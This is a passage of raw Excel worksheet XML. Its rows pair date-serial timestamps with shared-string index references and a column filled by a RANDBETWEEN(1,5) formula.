        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27517" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27517" s="1">
        <v>42880.028333333335</v>
      </c>
      <c r="C27517" t="s">
        <v>10</v>
      </c>
      <c r="D27517" t="s">
        <v>11</v>
      </c>
      <c r="E27517" s="2" t="s">
        <v>25002</v>
      </c>
      <c r="F27517">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27518" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27518" s="1">
        <v>42879.890081018515</v>
      </c>
      <c r="C27518" t="s">
        <v>6</v>
      </c>
      <c r="D27518" t="s">
        <v>25</v>
      </c>
      <c r="E27518" s="2" t="s">
        <v>25033</v>
      </c>
      <c r="F27518">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27519" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27519" s="1">
        <v>42879.878518518519</v>
      </c>
      <c r="C27519" t="s">
        <v>140</v>
      </c>
      <c r="D27519" t="s">
        <v>234</v>
      </c>
      <c r="E27519" s="2" t="s">
        <v>25034</v>
      </c>
      <c r="F27519">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27520" s="1">
        <v>42879.772083333337</v>
      </c>
      <c r="C27520" t="s">
        <v>140</v>
      </c>
      <c r="D27520" t="s">
        <v>141</v>
      </c>
      <c r="E27520" t="s">
        <v>25035</v>
      </c>
      <c r="F27520">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27521" s="1">
        <v>42879.758738425924</v>
      </c>
      <c r="C27521" t="s">
        <v>10</v>
      </c>
      <c r="D27521" t="s">
        <v>94</v>
      </c>
      <c r="E27521" t="s">
        <v>25036</v>
      </c>
      <c r="F27521">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27522" s="1">
        <v>42879.72965277778</v>
      </c>
      <c r="C27522" t="s">
        <v>10</v>
      </c>
      <c r="D27522" t="s">
        <v>163</v>
      </c>
      <c r="E27522" t="s">
        <v>25037</v>
      </c>
      <c r="F27522">
        <f t="shared" ref="F27522:F27585" ca="1" si="430">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27523" s="1">
        <v>42879.718368055554</v>
      </c>
      <c r="C27523" t="s">
        <v>6</v>
      </c>
      <c r="D27523" t="s">
        <v>821</v>
      </c>
      <c r="E27523" t="s">
        <v>25038</v>
      </c>
      <c r="F27523">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27524" s="1">
        <v>42879.713206018518</v>
      </c>
      <c r="C27524" t="s">
        <v>6</v>
      </c>
      <c r="D27524" t="s">
        <v>602</v>
      </c>
      <c r="E27524" t="s">
        <v>25039</v>
      </c>
      <c r="F27524">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27525" s="1">
        <v>42879.712812500002</v>
      </c>
      <c r="C27525" t="s">
        <v>10</v>
      </c>
      <c r="D27525" t="s">
        <v>14</v>
      </c>
      <c r="E27525" t="s">
        <v>25040</v>
      </c>
      <c r="F27525">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27526" s="1">
        <v>42879.670925925922</v>
      </c>
      <c r="C27526" t="s">
        <v>10</v>
      </c>
      <c r="D27526" t="s">
        <v>178</v>
      </c>
      <c r="E27526" t="s">
        <v>25041</v>
      </c>
      <c r="F27526">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27527" s="1">
        <v>42879.663356481484</v>
      </c>
      <c r="C27527" t="s">
        <v>10</v>
      </c>
      <c r="D27527" t="s">
        <v>86</v>
      </c>
      <c r="E27527" t="s">
        <v>25042</v>
      </c>
      <c r="F27527">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27528" s="1">
        <v>42879.660092592596</v>
      </c>
      <c r="C27528" t="s">
        <v>10</v>
      </c>
      <c r="D27528" t="s">
        <v>80</v>
      </c>
      <c r="E27528" t="s">
        <v>25043</v>
      </c>
      <c r="F27528">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27529" s="1">
        <v>42879.65934027778</v>
      </c>
      <c r="C27529" t="s">
        <v>71</v>
      </c>
      <c r="E27529" t="s">
        <v>25044</v>
      </c>
      <c r="F27529">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27530" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27530" s="1">
        <v>42879.648587962962</v>
      </c>
      <c r="C27530" t="s">
        <v>10</v>
      </c>
      <c r="D27530" t="s">
        <v>46</v>
      </c>
      <c r="E27530" s="2" t="s">
        <v>25045</v>
      </c>
      <c r="F27530">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27531" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27531" s="1">
        <v>42879.641111111108</v>
      </c>
      <c r="C27531" t="s">
        <v>10</v>
      </c>
      <c r="D27531" t="s">
        <v>6</v>
      </c>
      <c r="E27531" s="2" t="s">
        <v>25046</v>
      </c>
      <c r="F27531">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27532" s="1">
        <v>42879.639305555553</v>
      </c>
      <c r="C27532" t="s">
        <v>6</v>
      </c>
      <c r="D27532" t="s">
        <v>25</v>
      </c>
      <c r="E27532" t="s">
        <v>25047</v>
      </c>
      <c r="F27532">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27533" s="1">
        <v>42879.590104166666</v>
      </c>
      <c r="C27533" t="s">
        <v>776</v>
      </c>
      <c r="E27533" t="s">
        <v>25048</v>
      </c>
      <c r="F27533">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27534" s="1">
        <v>42879.57916666667</v>
      </c>
      <c r="C27534" t="s">
        <v>71</v>
      </c>
      <c r="E27534" t="s">
        <v>25049</v>
      </c>
      <c r="F27534">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27535" s="1">
        <v>42879.553599537037</v>
      </c>
      <c r="C27535" t="s">
        <v>71</v>
      </c>
      <c r="E27535" t="s">
        <v>25049</v>
      </c>
      <c r="F27535">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27536" s="1">
        <v>42879.544687499998</v>
      </c>
      <c r="C27536" t="s">
        <v>10</v>
      </c>
      <c r="D27536" t="s">
        <v>80</v>
      </c>
      <c r="E27536" t="s">
        <v>25050</v>
      </c>
      <c r="F27536">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27537" s="1">
        <v>42879.52447916667</v>
      </c>
      <c r="C27537" t="s">
        <v>10</v>
      </c>
      <c r="D27537" t="s">
        <v>163</v>
      </c>
      <c r="E27537" t="s">
        <v>25051</v>
      </c>
      <c r="F27537">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27538" s="1">
        <v>42879.524155092593</v>
      </c>
      <c r="C27538" t="s">
        <v>10</v>
      </c>
      <c r="D27538" t="s">
        <v>667</v>
      </c>
      <c r="E27538" t="s">
        <v>25052</v>
      </c>
      <c r="F27538">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27539" s="1">
        <v>42879.499513888892</v>
      </c>
      <c r="C27539" t="s">
        <v>222</v>
      </c>
      <c r="E27539" t="s">
        <v>25053</v>
      </c>
      <c r="F27539">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27540" s="1">
        <v>42879.475081018521</v>
      </c>
      <c r="C27540" t="s">
        <v>10</v>
      </c>
      <c r="D27540" t="s">
        <v>46</v>
      </c>
      <c r="E27540" t="s">
        <v>25054</v>
      </c>
      <c r="F27540">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27541" s="1">
        <v>42879.462719907409</v>
      </c>
      <c r="C27541" t="s">
        <v>10</v>
      </c>
      <c r="D27541" t="s">
        <v>36</v>
      </c>
      <c r="E27541" t="s">
        <v>25055</v>
      </c>
      <c r="F27541">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27542" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27542" s="1">
        <v>42879.457083333335</v>
      </c>
      <c r="C27542" t="s">
        <v>16</v>
      </c>
      <c r="E27542" s="2" t="s">
        <v>25056</v>
      </c>
      <c r="F27542">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27543" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27543" s="1">
        <v>42879.454675925925</v>
      </c>
      <c r="C27543" t="s">
        <v>6</v>
      </c>
      <c r="D27543" t="s">
        <v>194</v>
      </c>
      <c r="E27543" s="2" t="s">
        <v>25057</v>
      </c>
      <c r="F27543">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27544" s="1">
        <v>42879.438101851854</v>
      </c>
      <c r="C27544" t="s">
        <v>10</v>
      </c>
      <c r="D27544" t="s">
        <v>36</v>
      </c>
      <c r="E27544" t="s">
        <v>25058</v>
      </c>
      <c r="F27544">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27545" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A27545" s="1">
        <v>42879.430381944447</v>
      </c>
      <c r="C27545" t="s">
        <v>16</v>
      </c>
      <c r="E27545" s="2" t="s">
        <v>25059</v>
      </c>
      <c r="F27545">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27546" s="1">
        <v>42879.428773148145</v>
      </c>
      <c r="C27546" t="s">
        <v>10</v>
      </c>
      <c r="D27546" t="s">
        <v>158</v>
      </c>
      <c r="E27546" t="s">
        <v>25060</v>
      </c>
      <c r="F27546">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27547" s="1">
        <v>42879.423159722224</v>
      </c>
      <c r="C27547" t="s">
        <v>6</v>
      </c>
      <c r="D27547" t="s">
        <v>25</v>
      </c>
      <c r="E27547" t="s">
        <v>25061</v>
      </c>
      <c r="F27547">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27548" s="1">
        <v>42879.396909722222</v>
      </c>
      <c r="C27548" t="s">
        <v>41</v>
      </c>
      <c r="E27548" t="s">
        <v>25062</v>
      </c>
      <c r="F27548">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27549" s="1">
        <v>42879.395844907405</v>
      </c>
      <c r="C27549" t="s">
        <v>41</v>
      </c>
      <c r="E27549" t="s">
        <v>25063</v>
      </c>
      <c r="F27549">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27550" s="1">
        <v>42879.395486111112</v>
      </c>
      <c r="C27550" t="s">
        <v>189</v>
      </c>
      <c r="E27550" t="s">
        <v>25064</v>
      </c>
      <c r="F27550">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27551" s="1">
        <v>42879.394699074073</v>
      </c>
      <c r="C27551" t="s">
        <v>10</v>
      </c>
      <c r="D27551" t="s">
        <v>178</v>
      </c>
      <c r="E27551" t="s">
        <v>25065</v>
      </c>
      <c r="F27551">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27552" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27552" s="1">
        <v>42879.367407407408</v>
      </c>
      <c r="C27552" t="s">
        <v>10</v>
      </c>
      <c r="D27552" t="s">
        <v>163</v>
      </c>
      <c r="E27552" s="2" t="s">
        <v>25066</v>
      </c>
      <c r="F27552">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27553" s="1">
        <v>42879.367361111108</v>
      </c>
      <c r="C27553" t="s">
        <v>10</v>
      </c>
      <c r="D27553" t="s">
        <v>667</v>
      </c>
      <c r="E27553" t="s">
        <v>25067</v>
      </c>
      <c r="F27553">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27554" s="1">
        <v>42879.341874999998</v>
      </c>
      <c r="C27554" t="s">
        <v>124</v>
      </c>
      <c r="E27554" t="s">
        <v>25068</v>
      </c>
      <c r="F27554">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27555" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27555" s="1">
        <v>42879.323437500003</v>
      </c>
      <c r="C27555" t="s">
        <v>16</v>
      </c>
      <c r="E27555" s="2" t="s">
        <v>25069</v>
      </c>
      <c r="F27555">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27556" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27556" s="1">
        <v>42879.306701388887</v>
      </c>
      <c r="C27556" t="s">
        <v>178</v>
      </c>
      <c r="E27556" s="2" t="s">
        <v>25070</v>
      </c>
      <c r="F27556">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27557" s="1">
        <v>42879.223923611113</v>
      </c>
      <c r="C27557" t="s">
        <v>48</v>
      </c>
      <c r="E27557" t="s">
        <v>25071</v>
      </c>
      <c r="F27557">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27558" s="1">
        <v>42879.209317129629</v>
      </c>
      <c r="C27558" t="s">
        <v>41</v>
      </c>
      <c r="E27558" t="s">
        <v>25072</v>
      </c>
      <c r="F27558">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27559" s="1">
        <v>42879.192465277774</v>
      </c>
      <c r="C27559" t="s">
        <v>3515</v>
      </c>
      <c r="E27559" t="s">
        <v>25073</v>
      </c>
      <c r="F27559">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27560" s="1">
        <v>42879.1878125</v>
      </c>
      <c r="C27560" t="s">
        <v>339</v>
      </c>
      <c r="E27560" t="s">
        <v>25074</v>
      </c>
      <c r="F27560">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27561" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27561" s="1">
        <v>42879.150613425925</v>
      </c>
      <c r="C27561" t="s">
        <v>65</v>
      </c>
      <c r="E27561" s="2" t="s">
        <v>25075</v>
      </c>
      <c r="F27561">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27562" s="1">
        <v>42879.074849537035</v>
      </c>
      <c r="C27562" t="s">
        <v>1050</v>
      </c>
      <c r="E27562" t="s">
        <v>25076</v>
      </c>
      <c r="F27562">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27563" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27563" s="1">
        <v>42879.06046296296</v>
      </c>
      <c r="C27563" t="s">
        <v>10</v>
      </c>
      <c r="D27563" t="s">
        <v>46</v>
      </c>
      <c r="E27563" s="2" t="s">
        <v>25077</v>
      </c>
      <c r="F27563">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27564" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27564" s="1">
        <v>42879.059803240743</v>
      </c>
      <c r="C27564" t="s">
        <v>10</v>
      </c>
      <c r="D27564" t="s">
        <v>11</v>
      </c>
      <c r="E27564" s="2" t="s">
        <v>25002</v>
      </c>
      <c r="F27564">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27565" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27565" s="1">
        <v>42879.049710648149</v>
      </c>
      <c r="C27565" t="s">
        <v>8872</v>
      </c>
      <c r="E27565" s="2" t="s">
        <v>25078</v>
      </c>
      <c r="F27565">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27566" s="1">
        <v>42878.993773148148</v>
      </c>
      <c r="C27566" t="s">
        <v>139</v>
      </c>
      <c r="E27566" t="s">
        <v>25079</v>
      </c>
      <c r="F27566">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27567" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27567" s="1">
        <v>42878.90116898148</v>
      </c>
      <c r="C27567" t="s">
        <v>10</v>
      </c>
      <c r="D27567" t="s">
        <v>6</v>
      </c>
      <c r="E27567" s="2" t="s">
        <v>25080</v>
      </c>
      <c r="F27567">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27568" s="1">
        <v>42878.701249999998</v>
      </c>
      <c r="C27568" t="s">
        <v>10</v>
      </c>
      <c r="D27568" t="s">
        <v>80</v>
      </c>
      <c r="E27568" t="s">
        <v>25081</v>
      </c>
      <c r="F27568">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27569" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27569" s="1">
        <v>42878.683935185189</v>
      </c>
      <c r="C27569" t="s">
        <v>10</v>
      </c>
      <c r="D27569" t="s">
        <v>80</v>
      </c>
      <c r="E27569" s="2" t="s">
        <v>25082</v>
      </c>
      <c r="F27569">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27570" s="1">
        <v>42878.665312500001</v>
      </c>
      <c r="C27570" t="s">
        <v>10</v>
      </c>
      <c r="D27570" t="s">
        <v>163</v>
      </c>
      <c r="E27570" t="s">
        <v>25083</v>
      </c>
      <c r="F27570">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27571" s="1">
        <v>42878.661759259259</v>
      </c>
      <c r="C27571" t="s">
        <v>222</v>
      </c>
      <c r="E27571" t="s">
        <v>25084</v>
      </c>
      <c r="F27571">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27572" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27572" s="1">
        <v>42878.64770833333</v>
      </c>
      <c r="C27572" t="s">
        <v>10</v>
      </c>
      <c r="D27572" t="s">
        <v>271</v>
      </c>
      <c r="E27572" s="2" t="s">
        <v>25085</v>
      </c>
      <c r="F27572">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27573" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27573" s="1">
        <v>42878.638969907406</v>
      </c>
      <c r="C27573" t="s">
        <v>10</v>
      </c>
      <c r="D27573" t="s">
        <v>36</v>
      </c>
      <c r="E27573" s="2" t="s">
        <v>25086</v>
      </c>
      <c r="F27573">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27574" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27574" s="1">
        <v>42878.62804398148</v>
      </c>
      <c r="C27574" t="s">
        <v>6</v>
      </c>
      <c r="D27574" t="s">
        <v>25</v>
      </c>
      <c r="E27574" s="2" t="s">
        <v>25087</v>
      </c>
      <c r="F27574">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27575" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27575" s="1">
        <v>42878.625983796293</v>
      </c>
      <c r="C27575" t="s">
        <v>10</v>
      </c>
      <c r="D27575" t="s">
        <v>494</v>
      </c>
      <c r="E27575" s="2" t="s">
        <v>25088</v>
      </c>
      <c r="F27575">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27576" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27576" s="1">
        <v>42878.618148148147</v>
      </c>
      <c r="C27576" t="s">
        <v>10</v>
      </c>
      <c r="D27576" t="s">
        <v>36</v>
      </c>
      <c r="E27576" s="2" t="s">
        <v>25089</v>
      </c>
      <c r="F27576">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27577" s="1">
        <v>42878.60460648148</v>
      </c>
      <c r="C27577" t="s">
        <v>10</v>
      </c>
      <c r="D27577" t="s">
        <v>6</v>
      </c>
      <c r="E27577" t="s">
        <v>25090</v>
      </c>
      <c r="F27577">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27578" s="1">
        <v>42878.592210648145</v>
      </c>
      <c r="C27578" t="s">
        <v>10</v>
      </c>
      <c r="D27578" t="s">
        <v>17</v>
      </c>
      <c r="E27578" t="s">
        <v>25091</v>
      </c>
      <c r="F27578">
        <f t="shared" ca="1" si="430"/>
        <v>5</v>
      </c>
    </row>
    <row r="27579" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27579" s="1">
        <v>42878.589722222219</v>
      </c>
      <c r="C27579" t="s">
        <v>65</v>
      </c>
      <c r="E27579" s="2" t="s">
        <v>25092</v>
      </c>
      <c r="F27579">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27580" s="1">
        <v>42878.58315972222</v>
      </c>
      <c r="C27580" t="s">
        <v>10</v>
      </c>
      <c r="D27580" t="s">
        <v>112</v>
      </c>
      <c r="E27580" t="s">
        <v>25093</v>
      </c>
      <c r="F27580">
        <f t="shared" ca="1" si="430"/>
        <v>4</v>
      </c>
    </row>
    <row r="27581" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27581" s="1">
        <v>42878.5784375</v>
      </c>
      <c r="C27581" t="s">
        <v>10</v>
      </c>
      <c r="D27581" t="s">
        <v>89</v>
      </c>
      <c r="E27581" s="2" t="s">
        <v>25094</v>
      </c>
      <c r="F27581">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27582" s="1">
        <v>42878.54010416667</v>
      </c>
      <c r="C27582" t="s">
        <v>10</v>
      </c>
      <c r="D27582" t="s">
        <v>6</v>
      </c>
      <c r="E27582" t="s">
        <v>25095</v>
      </c>
      <c r="F27582">
        <f t="shared" ca="1" si="430"/>
        <v>2</v>
      </c>
    </row>
    <row r="27583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27583" s="1">
        <v>42878.538541666669</v>
      </c>
      <c r="C27583" t="s">
        <v>10</v>
      </c>
      <c r="D27583" t="s">
        <v>56</v>
      </c>
      <c r="E27583" t="s">
        <v>25096</v>
      </c>
      <c r="F27583">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27584" s="1">
        <v>42878.531307870369</v>
      </c>
      <c r="C27584" t="s">
        <v>10</v>
      </c>
      <c r="D27584" t="s">
        <v>271</v>
      </c>
      <c r="E27584" t="s">
        <v>25097</v>
      </c>
      <c r="F27584">
        <f t="shared" ca="1" si="430"/>
        <v>1</v>
      </c>
    </row>
    <row r="27585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27585" s="1">
        <v>42878.493298611109</v>
      </c>
      <c r="C27585" t="s">
        <v>6</v>
      </c>
      <c r="D27585" t="s">
        <v>25</v>
      </c>
      <c r="E27585" t="s">
        <v>25098</v>
      </c>
      <c r="F27585">
        <f t="shared" ca="1" si="430"/>
        <v>3</v>
      </c>
    </row>
    <row r="27586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27586" s="1">
        <v>42878.488680555558</v>
      </c>
      <c r="C27586" t="s">
        <v>10</v>
      </c>
      <c r="D27586" t="s">
        <v>381</v>
      </c>
      <c r="E27586" t="s">
        <v>25099</v>
      </c>
      <c r="F27586">
        <f t="shared" ref="F27586:F27649" ca="1" si="431">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="27587" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27587" s="1">
        <v>42878.448518518519</v>
      </c>
      <c r="C27587" t="s">
        <v>16</v>
      </c>
      <c r="E27587" s="2" t="s">
        <v>25100</v>
      </c>
      <c r="F27587">
        <f t="shared" ca="1" si="431"/>
        <v>1</v>
      </c>
    </row>
    <row r="27588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27588" s="1">
        <v>42878.44059027778</v>
      </c>
      <c r="C27588" t="s">
        <v>10</v>
      </c>
      <c r="D27588" t="s">
        <v>36</v>
      </c>
      <c r="E27588" t="s">
        <v>25101</v>
      </c>
      <c r="F27588">
        <f t="shared" ca="1" si="431"/>
        <v>2</v>
      </c>
    </row>
    <row r="27589" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27589" s="1">
        <v>42878.44021990741</v>
      </c>
      <c r="C27589" t="s">
        <v>10</v>
      </c>
      <c r="D27589" t="s">
        <v>23</v>
      </c>
      <c r="E27589" s="2" t="s">
        <v>25102</v>
      </c>
      <c r="F27589">
        <f t="shared" ca="1" si="431"/>
        <v>1</v>
      </c>
    </row>
    <row r="27590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27590" s="1">
        <v>42878.438078703701</v>
      </c>
      <c r="C27590" t="s">
        <v>10</v>
      </c>
      <c r="D27590" t="s">
        <v>36</v>
      </c>
      <c r="F27590">
        <f t="shared" ca="1" si="431"/>
        <v>3</v>
      </c>
    </row>
    <row r="27591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27591" s="1">
        <v>42878.425358796296</v>
      </c>
      <c r="C27591" t="s">
        <v>10</v>
      </c>
      <c r="D27591" t="s">
        <v>163</v>
      </c>
      <c r="E27591" t="s">
        <v>25103</v>
      </c>
      <c r="F27591">
        <f t="shared" ca="1" si="431"/>
        <v>5</v>
      </c>
    </row>
    <row r="27592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27592" s="1">
        <v>42878.422013888892</v>
      </c>
      <c r="C27592" t="s">
        <v>10</v>
      </c>
      <c r="D27592" t="s">
        <v>192</v>
      </c>
      <c r="E27592" t="s">
        <v>25104</v>
      </c>
      <c r="F27592">
        <f t="shared" ca="1" si="431"/>
        <v>1</v>
      </c>
    </row>
    <row r="27593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27593" s="1">
        <v>42878.410624999997</v>
      </c>
      <c r="C27593" t="s">
        <v>10</v>
      </c>
      <c r="D27593" t="s">
        <v>46</v>
      </c>
      <c r="E27593" t="s">
        <v>25105</v>
      </c>
      <c r="F27593">
        <f t="shared" ca="1" si="431"/>
        <v>1</v>
      </c>
    </row>
    <row r="27594" spans="1:6" ht="120" x14ac:dyDescent="0.25">
